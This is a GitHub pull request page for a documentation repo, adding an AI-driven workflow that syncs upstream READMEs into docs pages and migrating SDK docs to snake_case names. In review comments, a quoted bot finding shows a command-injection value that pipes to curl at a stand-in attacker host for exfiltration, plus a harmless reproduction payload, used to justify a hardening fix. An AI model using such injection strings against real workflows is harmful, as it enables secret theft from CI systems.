Skip to content

Develop#37

Merged
saadqbal merged 7 commits into
mainfrom
develop
May 13, 2026
Merged

Develop#37
saadqbal merged 7 commits into
mainfrom
develop

Conversation

@divyasinghds
Copy link
Copy Markdown
Contributor

@divyasinghds divyasinghds commented May 11, 2026

Summary

Related

Type of change

  • Feature
  • Bug fix
  • Tech-debt / refactor
  • Docs
  • Security / hardening
  • Breaking change

Test plan

Screenshots / recordings

Deployment notes

Checklist

  • Tests added / updated and passing locally
  • Docs updated if behavior or config changed
  • No secrets / credentials in the diff
  • For security-sensitive paths: appropriate reviewer requested

Note

Medium Risk
Adds a scheduled/dispatch-triggered GitHub Actions pipeline that fetches content from multiple repos and uses Claude to rewrite docs pages, which could introduce unintended documentation changes and relies on multiple secrets/tokens.

Overview
Introduces an automated docs sync system driven by .github/sync-sources.yml: upstream README changes can now trigger a repository_dispatch, which runs a new sync-docs workflow to fetch the upstream files and use anthropics/claude-code-action to update only the mapped dest .mdx pages, then open/update a PR on docs/sync-upstream.

Updates several docs pages to align with the renamed Python SDK (tracebloc_packagetracebloc) and newer snake_case API method names, adjusts install guidance to use framework extras (e.g. pip install "tracebloc[pytorch]"), simplifies the data-ingestor Docker build instructions, and rewires navigation/redirects in docs.json to point legacy tracebloc-package URLs to tools-help/tracebloc.

Reviewed by Cursor Bugbot for commit 4771d1f. Bugbot is set up for automated code reviews on this repo. Configure here.

divyasinghds and others added 2 commits May 11, 2026 15:53
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* docs: remove open-source client claim from how-training-works

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* docs: say "contact us" instead of "open a support ticket"

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Asad Iqbal (Saadi) <asad.dsoft@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@divyasinghds divyasinghds requested a review from saadqbal May 11, 2026 10:39
@divyasinghds divyasinghds self-assigned this May 11, 2026
saadqbal
saadqbal previously approved these changes May 11, 2026
* docs: add automated upstream sync workflow

Adds a Claude-powered workflow that syncs docs pages with upstream README
changes from five source repos (tracebloc-py-package, client, start-training,
data-ingestors, model-zoo). Source repos fire repository_dispatch on push;
this repo's workflow fetches the upstream file, has Claude rewrite the target
.mdx in docs voice, and opens a PR.

- .github/sync-sources.yml: mapping of upstream files to docs pages
- .github/workflows/sync-docs.yml: dispatch + manual + cron-driven sync job
- .github/notify-docs.workflow-template.yml: template for source repos

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix: address bugbot issues in sync workflow

- Pass ANTHROPIC_API_KEY as anthropic_api_key input to claude-code-action
  instead of env var (action reads via core.getInput, not env).
- Move sync cache from .sync-cache/ to /tmp/sync-cache/ so untracked
  cache files are not picked up by create-pull-request.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: address remaining bugbot issues in sync workflow

- Add concurrency group so overlapping cron/dispatch/manual runs
  serialize instead of racing on the docs/sync-upstream branch
  (would otherwise fail with "failed to push some refs" and drop
  changes from the losing run).
- Pin yq to v4.44.3 instead of latest for deterministic builds.
- Restrict create-pull-request add-paths to **/*.mdx so stray edits
  outside docs pages cannot be staged into the sync PR.
- Note in the notify template that branches may need adjusting for
  repos using master (e.g. data-ingestors).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: accumulate sync runs onto existing PR branch

Previously each run checked out the default branch fresh and force-pushed
only the dispatched source's diff to docs/sync-upstream, silently
overwriting any earlier dispatched sources' pending changes.

Now the workflow:
- Checks if docs/sync-upstream exists on the remote; if so, checks it
  out so prior accumulated changes are part of the working tree.
- Resolves the default branch dynamically and passes it to peter-evans
  as the explicit base so the PR continues targeting the right branch
  even after we switched off it.

Result: sequential dispatches for different sources combine into one
PR instead of clobbering each other.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: read sync-sources.yml from base branch, not stale sync branch

After the previous fix switched the working tree to docs/sync-upstream
to accumulate changes, all subsequent reads of .github/sync-sources.yml
were coming from the (potentially stale) sync branch instead of the
base branch. If a new source were added or an instruction edited on
main while a sync PR was pending, the workflow would silently use the
outdated config.

Snapshot the mapping to /tmp/sync-sources.yml before any branch switch,
and point both the yq filter step and the Claude prompt at the snapshot.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Co-authored-by: Asad Iqbal <asad.dsoft@gmail.com>
Comment thread .github/sync-sources.yml
…kage 0.7.0) (#14)

Sync hyperparameters and start-training pages with the legacy
tracebloc/documentation repo:

- Rename camelCase API methods to snake_case: upload_model,
  link_model_dataset, experiment_name, get_training_plan,
  learning_rate, loss_function, layers_freeze, early_stop_callback,
  reduce_lr_callback, model_checkpoint_callback,
  terminate_on_nan_callback, training_classes, data_type
- Rename trainingObject → training
- Update terminate-on-NaN description (any NaN loss)
- Use pip optional-extras syntax: tracebloc_package[pytorch|tensorflow|sklearn|all]

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* docs: migrate SDK page to tracebloc 0.8.x (closes #38)

The SDK was renamed in tracebloc/tracebloc-py-package#135. `tracebloc==0.8.1`
is live on PyPI. Migrating Mintlify docs to the canonical name.

- Rename `tools-help/tracebloc-package.mdx` -> `tools-help/tracebloc.mdx`.
- Rewrite the page: `tracebloc` install + import, snake_case API
  (post-SDK.2), historical Note about the rename, link to redirect
  package on PyPI.
- Bump install pin to `>=0.8.0` (was `>=0.6.32`); add per-extra
  install options.
- `docs.json`:
  - Nav: `tools-help/tracebloc-package` -> `tools-help/tracebloc`.
  - Add `/tools-help/tracebloc-package` -> `/tools-help/tracebloc`
    redirect to preserve old inbound links.
  - Existing redirects pointing at `/tools-help/tracebloc-package`
    now point at `/tools-help/tracebloc`.
- Internal cross-links in faqs.mdx + key-terms.mdx -> new URL.
- `join-use-case/start-training.mdx` install snippet -> new name + pin.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* docs: bump install pin to 0.8.1 (latest)

* docs: migrate SDK examples to snake_case API (post-SDK.2)

The 0.7.0 SDK.2 release renamed the public Python API to PEP 8 /
snake_case. The old camelCase forms still work via deprecation
aliases (with DeprecationWarning) but new examples should use the
canonical names.

Updates the three customer-facing pages that still showed the
camelCase API:

- `join-use-case/start-training.mdx` — the main walk-through.
- `join-use-case/hyperparameters.mdx` — the full reference table.
- `join-use-case/model-optimization.mdx` — pretrained-weights upload.

Method renames applied (per tracebloc-py-package/MIGRATION.md):
- `uploadModel` -> `upload_model` (+ `model_name=` kwarg)
- `linkModelDataset` -> `link_model_dataset` (+ `dataset_id=` kwarg)
- `getTrainingPlan` -> `get_training_plan`
- `experimentName` -> `experiment_name`
- `learningRate` -> `learning_rate`
- `lossFunction` -> `loss_function`
- `layersFreeze` -> `layers_freeze`
- `earlystopCallback` -> `early_stop_callback`
- `reducelrCallback` -> `reduce_lr_callback`
- `modelCheckpointCallback` -> `model_checkpoint_callback`
- `terminateOnNaNCallback` -> `terminate_on_nan_callback`
- `trainingClasses` -> `training_classes`
- `dataType` -> `data_type`

The `model_name` and `dataset_id` keyword names are no longer aliased
in 0.8.x — passing positional args still works, but the kwargs
`modelname=` / `datasetId=` raise TypeError, so the docs use the
explicit kwarg form everyone should adopt.

Also renames the local variable `trainingObject` -> `training_plan`
throughout, matching the canonical sample workflow in tracebloc's
project CLAUDE.md.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix(ci): update sync-sources.yml dest after file rename (bugbot)

`tools-help/tracebloc-package.mdx` was renamed to `tools-help/tracebloc.mdx`
earlier in this PR, but the daily `sync-docs.yml` cron reads
`.github/sync-sources.yml` and would have either recreated the old
orphan path or failed outright — silently preventing upstream README
edits from reaching the new page.

Repointing the dest at `tools-help/tracebloc.mdx` keeps the upstream
README -> docs page sync working. The mapping `id` stays
`tracebloc-package` (it's a slug used for dispatch; changing it would
need a coordinated edit in the upstream notify workflow, which doesn't
exist yet — scope creep here).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 <noreply@anthropic.com>
Three entries pointed at `main` branches that do not exist in the
upstream repos, which would cause the sync fetch step to 404:
- tracebloc-py-package → develop (default; `main` does not exist; per
  the SDK repo's CLAUDE.md, develop is the canonical source of truth)
- data-ingestors → master (default branch)
- model-zoo → master (default branch)

Verified against the GitHub API for each repo. The `Readme.md` casing
flagged by bugbot is correct as-is: data-ingestors actually ships
`Readme.md` (mixed case), so the bugbot suggestion would have broken
the fetch — left unchanged.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
@saadqbal
Copy link
Copy Markdown
Contributor

Reviewer pass (acting as a second-look reviewer alongside bugbot)

Bugbot finding — false positive

data-ingestors source entry uses src: Readme.md while all four others use README.md … the fetch will 404.

Verified against the upstream repo — the file is actually named Readme.md (mixed case):

$ gh api repos/tracebloc/data-ingestors/contents/?ref=master --jq '.[] | select(.name | test("readme"; "i")) | .name'
Readme.md
$ gh api repos/tracebloc/data-ingestors/contents/README.md
{"message":"Not Found","status":"404"}

Applying bugbot's suggestion (Readme.mdREADME.md) would actually break the fetch. Left as-is.

Real bugs found during the same audit (fixed in aaaac32)

While verifying the casing claim I checked ref: for every entry. Three entries point at main branches that don't exist upstream — the fetch step would 404 for all three on the first run:

id configured ref upstream default fix
tracebloc-package main develop (no main branch; master is deprecated per the SDK repo's CLAUDE.md) develop
data-ingestors main master (no main branch) master
model-zoo main master (no main branch) master

Only client and start-training actually have a main branch, so those entries were already correct.

Other things I looked at and didn't change

  • sync-docs.yml snapshots sync-sources.yml from the base branch before checking out docs/sync-upstream — protects against stale config from a pending PR. Good.
  • concurrency.cancel-in-progress: false is the right call for a write-side workflow; a cancelled run mid-commit would be worse than a queue.
  • add-paths: "**/*.mdx" in peter-evans/create-pull-request is a reasonable belt-and-suspenders on top of the Claude prompt's "do not edit outside dest paths" instruction.
  • The notify-docs template's per-repo customization comments (paths:, branches:) already cover the Readme.md / master cases for the three repos that need it — anyone copying the template into data-ingestors or model-zoo will see the guidance.

Suggested follow-ups (non-blocking)

  • The PR title is just Develop — worth retitling before merge so the changelog/squash commit reads sensibly (e.g. docs: add upstream sync workflow + 0.8.x SDK rename).
  • Consider a CI lint that validates every ref and src in sync-sources.yml actually resolves on GitHub (a one-shot gh api repos/.../contents/<src>?ref=<ref> per entry) — would have caught the three broken refs before merge.

Copy link
Copy Markdown

@cursor cursor Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Fix All in Cursor

❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, enable autofix in the Cursor dashboard.

Reviewed by Cursor Bugbot for commit aaaac32. Configure here.

Comment thread .github/workflows/sync-docs.yml
Bugbot flagged the previous `yq ".sources[] | select(.id == \"$target\")"`
pattern as shell-injectable. The specific RCE described doesn't
actually trigger — `DISPATCH_ID` / `INPUT_ID` are routed through
`env:` (Actions best practice) and bash does not re-tokenize
variable values inside double quotes, so `$()`, backticks, and `;`
in the value remain literal.

However, a `"` in the value would still terminate the yq string
literal at the yq parser level and could yield a malformed query or
unintended filter. Routing the value through `strenv(TARGET)` keeps
it entirely out of the yq expression syntax — defense in depth at
zero cost.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
@saadqbal
Copy link
Copy Markdown
Contributor

Reviewer pass #2

Bugbot finding — partially correct; fix applied (4771d1f)

The \$target variable, sourced from client_payload.source_id, is expanded inside a double-quoted shell string passed to yq … a source_id of x"; curl attacker.com/exfil…; # would execute arbitrary commands.

The specific RCE doesn't actually trigger:

  1. DISPATCH_ID / INPUT_ID are routed through env: (GitHub Actions best practice for untrusted input), so \${{ }} interpolation produces a literal env-var value, not script text.
  2. Bash does not re-tokenize values expanded inside double quotes — \$(), backticks, and ; in a variable's value are passed through as literal characters, not re-evaluated.

Reproduced locally:

$ DISPATCH_ID='x"; echo PWNED; #' bash -c \
    'target="\${DISPATCH_ID:-}"; echo arg=".sources[] | select(.id == \\"\$target\\")"'
arg=.sources[] | select(.id == "x"; echo PWNED; #")

No PWNEDecho PWNED is part of the yq argument, not a shell command.

But bugbot is right that this needs hardening anyway. Even without shell-level RCE, a \" in the payload would terminate the yq string literal at the parser level. Worst case is a malformed query or an unintended filter — not RCE, but also not what we want. The fix in 4771d1f routes the value through strenv(TARGET) so it never touches the yq expression syntax:

TARGET="\$target" yq -o=json \
  '.sources[] | select(.id == strenv(TARGET))' \
  /tmp/sync-sources.yml | jq -s . > /tmp/sources.json

Additional things I noticed (non-blocking, leaving for maintainer)

  1. add-paths: "**/*.mdx" is broader than the actual destinations. The Claude prompt says "do not edit files outside dest paths," but there's no mechanical enforcement. If Claude touches an unrelated .mdx, the create-pull-request step will happily commit it. Worth computing the dest list from sync-sources.yml at runtime and passing those paths explicitly — turns the soft instruction into a hard guard.

  2. wget install of yq has no checksum verification (.github/workflows/sync-docs.yml#L55-L58). If a future GitHub runner image change or transient TLS issue ever served a tampered binary, it would run with contents: write + access to SOURCE_REPOS_TOKEN and ANTHROPIC_API_KEY. Pinning the sha256 (or switching to uses: mikefarah/yq@…) closes that door cheaply.

  3. Third-party actions pinned by tag, not SHA (peter-evans/create-pull-request@v6, anthropics/claude-code-action@v1). Standard practice in this repo, but if the org adopts SHA-pinning later, this workflow is in scope.

These are reviewer suggestions, not blockers — the PR as-is (with 4771d1f) is safe to merge.

@saadqbal saadqbal merged commit ace6640 into main May 13, 2026
5 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants